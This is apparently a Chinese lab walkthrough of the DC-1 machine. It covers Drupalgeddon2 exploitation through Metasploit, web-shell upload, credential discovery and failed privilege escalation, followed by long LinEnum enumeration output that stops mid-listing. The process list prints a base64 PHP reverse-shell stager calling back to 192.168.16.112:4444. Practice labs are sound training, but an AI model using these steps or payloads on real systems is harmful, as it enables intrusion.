将靶场搭建起来 桥接看不到IP 于是用masscan 进行C段扫描 试试80 8080
访问之后发现是个drupal
掏出msf搜索一波
使用最近年限的exp尝试
exploit/unix/webapp/drupal_drupalgeddon2
攻击成功 返回meterpreter的shell
进行简单的信息收集
发现并不是root权限 ,想办法进行提权,首先执行常用的Linux提权检查工具
./Linux_Exploit_Suggester.pl
并没有返回可用的提权建议 于是用searchsploit 3.2.0尝试
表红框的exp.c编译并没有成功 提权失败
上菜刀方便查看文件 shell.php
尝试去进行Linux -udf提权
然后想的是用菜刀翻看连接数据库的账户看是否是高权限
在
/var/www/sites/default/settings.php
发现账号密码 但估计不是高权限
连接尝试
并不是root高权限
然后用Linux 提权检查工具LinEnum.sh 查看弱点
1 [00;31m#########################################################[00m 2 [00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m 3 [00;31m#########################################################[00m 4 [00;33m# www.rebootuser.com[00m 5 [00;33m# version 0.95[00m 6 7 [-] Debug Info 8 [00;33m[+] Thorough tests = Disabled[00m 9 10 11 [00;33mScan started at: 12 Tue May 7 01:08:48 AEST 2019 13 [00m 14 15 [00;33m### SYSTEM ##############################################[00m 16 [00;31m[-] Kernel information:[00m 17 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux 18 19 20 [00;31m[-] Kernel information (continued):[00m 21 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1 22 23 24 [00;31m[-] Specific release information:[00m 25 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)" 26 NAME="Debian GNU/Linux" 27 VERSION_ID="7" 28 VERSION="7 (wheezy)" 29 ID=debian 30 ANSI_COLOR="1;31" 31 HOME_URL="http://www.debian.org/" 32 SUPPORT_URL="http://www.debian.org/support/" 33 BUG_REPORT_URL="http://bugs.debian.org/" 34 35 36 [00;31m[-] Hostname:[00m 37 DC-1 38 39 40 [00;33m### USER/GROUP ##########################################[00m 41 [00;31m[-] Current user/group info:[00m 42 uid=33(www-data) gid=33(www-data) groups=33(www-data) 43 44 45 [00;31m[-] Users that have previously logged onto the system:[00m 46 Username Port From Latest 47 root tty1 Thu Feb 28 12:10:51 +1000 2019 48 49 50 [00;31m[-] Who else is logged on:[00m 51 01:08:48 up 1:00, 0 users, load average: 0.00, 0.00, 0.00 52 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 53 54 55 [00;31m[-] Group memberships:[00m 56 uid=0(root) gid=0(root) groups=0(root) 57 uid=1(daemon) gid=1(daemon) groups=1(daemon) 58 uid=2(bin) gid=2(bin) groups=2(bin) 59 uid=3(sys) gid=3(sys) groups=3(sys) 60 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) 61 uid=5(games) gid=60(games) groups=60(games) 62 uid=6(man) gid=12(man) groups=12(man) 63 uid=7(lp) gid=7(lp) groups=7(lp) 64 uid=8(mail) gid=8(mail) groups=8(mail) 65 uid=9(news) gid=9(news) groups=9(news) 66 uid=10(uucp) gid=10(uucp) groups=10(uucp) 67 uid=13(proxy) gid=13(proxy) groups=13(proxy) 68 uid=33(www-data) gid=33(www-data) groups=33(www-data) 69 uid=34(backup) gid=34(backup) groups=34(backup) 70 uid=38(list) gid=38(list) groups=38(list) 71 uid=39(irc) gid=39(irc) groups=39(irc) 72 uid=41(gnats) gid=41(gnats) groups=41(gnats) 73 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) 74 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid) 75 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim) 76 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup) 77 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) 78 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup) 79 uid=105(mysql) gid=109(mysql) groups=109(mysql) 80 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4) 81 82 83 [00;31m[-] Contents of /etc/passwd:[00m 84 root:x:0:0:root:/root:/bin/bash 85 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 86 bin:x:2:2:bin:/bin:/bin/sh 87 sys:x:3:3:sys:/dev:/bin/sh 88 sync:x:4:65534:sync:/bin:/bin/sync 89 games:x:5:60:games:/usr/games:/bin/sh 90 man:x:6:12:man:/var/cache/man:/bin/sh 91 lp:x:7:7:lp:/var/spool/lpd:/bin/sh 92 mail:x:8:8:mail:/var/mail:/bin/sh 93 news:x:9:9:news:/var/spool/news:/bin/sh 94 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 95 proxy:x:13:13:proxy:/bin:/bin/sh 96 www-data:x:33:33:www-data:/var/www:/bin/sh 97 backup:x:34:34:backup:/var/backups:/bin/sh 98 list:x:38:38:Mailing List Manager:/var/list:/bin/sh 99 irc:x:39:39:ircd:/var/run/ircd:/bin/sh 100 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 101 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 102 libuuid:x:100:101::/var/lib/libuuid:/bin/sh 103 Debian-exim:x:101:104::/var/spool/exim4:/bin/false 104 statd:x:102:65534::/var/lib/nfs:/bin/false 105 messagebus:x:103:107::/var/run/dbus:/bin/false 106 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin 107 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false 108 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash 109 110 111 [00;31m[-] Super user account(s):[00m 112 root 113 114 115 [00;31m[-] Are permissions on /home directories lax:[00m 116 total 12K 117 drwxr-xr-x 3 root root 4.0K Feb 19 23:51 . 118 drwxr-xr-x 23 root root 4.0K Feb 19 22:34 .. 119 drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4 120 121 122 [00;31m[-] Root is allowed to login via SSH:[00m 123 PermitRootLogin yes 124 125 126 [00;33m### ENVIRONMENTAL #######################################[00m 127 [00;31m[-] Environment information:[00m 128 APACHE_PID_FILE=/var/run/apache2.pid 129 APACHE_RUN_USER=www-data 130 APACHE_LOG_DIR=/var/log/apache2 131 PATH=/usr/local/bin:/usr/bin:/bin 132 PWD=/var/www 133 APACHE_RUN_GROUP=www-data 134 LANG=C 135 SHLVL=1 136 APACHE_LOCK_DIR=/var/lock/apache2 137 APACHE_RUN_DIR=/var/run/apache2 138 _=/usr/bin/env 139 140 141 [00;31m[-] Path information:[00m 142 /usr/local/bin:/usr/bin:/bin 143 144 145 [00;31m[-] Available shells:[00m 146 # /etc/shells: valid login shells 147 /bin/sh 148 /bin/dash 149 /bin/bash 150 /bin/rbash 151 152 153 [00;31m[-] Current umask value:[00m 154 0022 155 u=rwx,g=rx,o=rx 156 157 158 [00;31m[-] umask value as specified in /etc/login.defs:[00m 159 UMASK 022 160 161 162 [00;31m[-] Password and storage information:[00m 163 PASS_MAX_DAYS 99999 164 PASS_MIN_DAYS 0 165 PASS_WARN_AGE 7 166 ENCRYPT_METHOD SHA512 167 168 169 [00;33m### JOBS/TASKS ##########################################[00m 170 [00;31m[-] Cron jobs:[00m 171 -rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab 172 173 /etc/cron.d: 174 total 16 175 drwxr-xr-x 2 root root 4096 Feb 19 23:01 . 176 drwxr-xr-x 85 root root 4096 May 7 00:08 .. 177 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 178 -rw-r--r-- 1 root root 510 May 10 2018 php5 179 180 /etc/cron.daily: 181 total 68 182 drwxr-xr-x 2 root root 4096 Feb 19 23:01 . 183 drwxr-xr-x 85 root root 4096 May 7 00:08 .. 184 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 185 -rwxr-xr-x 1 root root 633 May 30 2018 apache2 186 -rwxr-xr-x 1 root root 14985 Oct 24 2014 apt 187 -rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude 188 -rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils 189 -rwxr-xr-x 1 root root 256 May 3 2016 dpkg 190 -rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base 191 -rwxr-xr-x 1 root root 89 May 17 2012 logrotate 192 -rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db 193 -rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate 194 -rwxr-xr-x 1 root root 249 May 26 2012 passwd 195 196 /etc/cron.hourly: 197 total 12 198 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 199 drwxr-xr-x 85 root root 4096 May 7 00:08 .. 200 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 201 202 /etc/cron.monthly: 203 total 12 204 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 205 drwxr-xr-x 85 root root 4096 May 7 00:08 .. 206 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 207 208 /etc/cron.weekly: 209 total 16 210 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 211 drwxr-xr-x 85 root root 4096 May 7 00:08 .. 212 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 213 -rwxr-xr-x 1 root root 907 Jun 19 2012 man-db 214 215 216 [00;31m[-] Crontab contents:[00m 217 # /etc/crontab: system-wide crontab 218 # Unlike any other crontab you don't have to run the `crontab' 219 # command to install the new version when you edit this file 220 # and files in /etc/cron.d. These files also have username fields, 221 # that none of the other crontabs do. 222 223 SHELL=/bin/sh 224 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 225 226 # m h dom mon dow user command 227 17 * * * * root cd / && run-parts --report /etc/cron.hourly 228 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 229 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 230 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) 231 # 232 233 234 [00;33m### NETWORKING ##########################################[00m 235 [00;31m[-] Network and IP info:[00m 236 eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98 237 inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0 238 inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link 239 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 240 RX packets:8702 errors:0 dropped:0 overruns:0 frame:0 241 TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0 242 collisions:0 txqueuelen:1000 243 RX bytes:1325354 (1.2 MiB) TX bytes:1103771 (1.0 MiB) 244 245 lo Link encap:Local Loopback 246 inet addr:127.0.0.1 Mask:255.0.0.0 247 inet6 addr: ::1/128 Scope:Host 248 UP LOOPBACK RUNNING MTU:16436 Metric:1 249 RX packets:50 errors:0 dropped:0 overruns:0 frame:0 250 TX packets:50 errors:0 dropped:0 overruns:0 carrier:0 251 collisions:0 txqueuelen:0 252 RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB) 253 254 255 [00;31m[-] ARP history:[00m 256 192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE 257 192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE 258 259 260 [00;31m[-] Nameserver(s):[00m 261 nameserver 192.168.16.254 262 nameserver 0.0.0.0 263 264 265 [00;31m[-] Default route:[00m 266 default via 192.168.16.254 dev eth0 267 268 269 [00;31m[-] Listening TCP:[00m 270 Active Internet connections (servers and established) 271 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 272 tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - 273 tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - 274 tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN - 275 tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - 276 tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - 277 tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php 278 tcp6 0 0 :::22 :::* LISTEN - 279 tcp6 0 0 ::1:25 :::* LISTEN - 280 tcp6 0 0 :::34190 :::* LISTEN - 281 tcp6 0 0 :::111 :::* LISTEN - 282 tcp6 0 0 :::80 :::* LISTEN - 283 tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT - 284 tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT - 285 286 287 [00;31m[-] Listening UDP:[00m 288 Active Internet connections (servers and established) 289 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 290 udp 0 0 0.0.0.0:59942 0.0.0.0:* - 291 udp 0 0 0.0.0.0:68 0.0.0.0:* - 292 udp 0 0 0.0.0.0:111 0.0.0.0:* - 293 udp 0 0 0.0.0.0:769 0.0.0.0:* - 294 udp 0 0 127.0.0.1:801 0.0.0.0:* - 295 udp 0 0 0.0.0.0:21881 0.0.0.0:* - 296 udp6 0 0 :::52815 :::* - 297 udp6 0 0 :::28256 :::* - 298 udp6 0 0 :::111 :::* - 299 udp6 0 0 :::769 :::* - 300 301 302 [00;33m### SERVICES #############################################[00m 303 [00;31m[-] Running processes:[00m 304 USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND 305 root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2] 306 root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd] 307 root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0] 308 root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0] 309 root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0] 310 root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset] 311 root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper] 312 root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs] 313 root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns] 314 root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers] 315 root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default] 316 root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd] 317 root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd] 318 root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd] 319 root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0] 320 root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd] 321 root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark] 322 root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto] 323 root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd] 324 root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff] 325 root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0] 326 root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1] 327 root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2] 328 root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3] 329 root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4] 330 root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5] 331 root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6] 332 root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7] 333 root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8] 334 root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9] 335 root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10] 336 root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11] 337 root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12] 338 root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13] 339 root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14] 340 root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15] 341 root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16] 342 root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17] 343 root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18] 344 root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19] 345 root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20] 346 root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21] 347 root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22] 348 root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23] 349 root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24] 350 root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25] 351 root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26] 352 root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27] 353 root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28] 354 root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29] 355 root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30] 356 root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31] 357 root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29] 358 root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30] 359 root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8] 360 root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit] 361 root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon 362 root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap] 363 root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused] 364 root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w 365 statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd 366 root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon 367 root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod] 368 root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod] 369 root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd 370 root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5 371 root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid 372 root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start 373 daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd 374 103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system 375 www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start 376 www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start 377 www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start 378 www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start 379 root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron 380 root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe 381 mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 382 root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error 383 101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m 384 root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty2 385 root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty3 386 root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty4 387 root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty5 388 root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty6 389 root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0] 390 root 3298 0.0 0.2 5196 2320 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 391 root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd 392 root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty1 393 www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start 394 www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start 395 www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start 396 www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start 397 www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start 398 www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start 399 www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));' 400 www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs)); 401 www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh 402 www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh 403 root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1] 404 root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2] 405 www-data 4398 0.0 0.1 3500 1764 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 406 www-data 4399 0.0 0.1 3552 1380 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 407 www-data 4400 0.0 0.0 1876 452 ? S 01:08 0:00 tee -a 408 www-data 4570 0.0 0.1 3536 1092 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 409 www-data 4571 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux 410 411 412 [00;31m[-] Process binaries and associated permissions (from above list):[00m 413 -rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash 414 lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash 415 -rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty 416 -rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd 417 -rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind 418 -rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon 419 -rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid 420 lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2 421 -rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd 422 -rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron 423 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4 424 -rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld 425 -rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd 426 -rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd 427 -rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd 428 429 430 [00;31m[-] /etc/init.d/ binary 